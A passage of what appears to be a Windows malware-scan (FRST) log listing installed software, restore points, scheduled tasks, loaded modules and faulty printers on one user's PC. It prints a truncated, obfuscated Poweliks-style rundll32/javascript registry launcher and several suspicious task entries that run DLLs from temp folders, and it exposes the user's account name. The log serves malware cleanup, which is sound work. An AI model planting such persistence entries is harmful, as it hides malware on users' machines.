Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden
CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden
ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden
ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)
Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)
Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)
Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden
DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)
Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)
GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)
iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)
iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)
Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden
MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)
Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)
ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden
Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden
Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden
SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)
SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)
SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden
Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (Version: 2007.0731.2234.38497 - ATI) Hidden
SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)
TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)
WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
25-07-2014 04:00:07 Scheduled Checkpoint
29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14  17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2014-08-23 14:19 - 2014-08-23 14:19 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2008-08-06 15:17 - 2007-08-20 01:08 - 00159744 _____ () C:\Windows\system32\atitmmxx.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 1022n
Description: HP LaserJet 1022n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6940 series
Description: Deskjet 6940 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: hp LaserJet 2420
Description: hp LaserJet 2420
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet CP1025nw
Description: HP LaserJet CP1025nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP LaserJet 200 color M251nw
Description: HP LaserJet 200 color M251nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
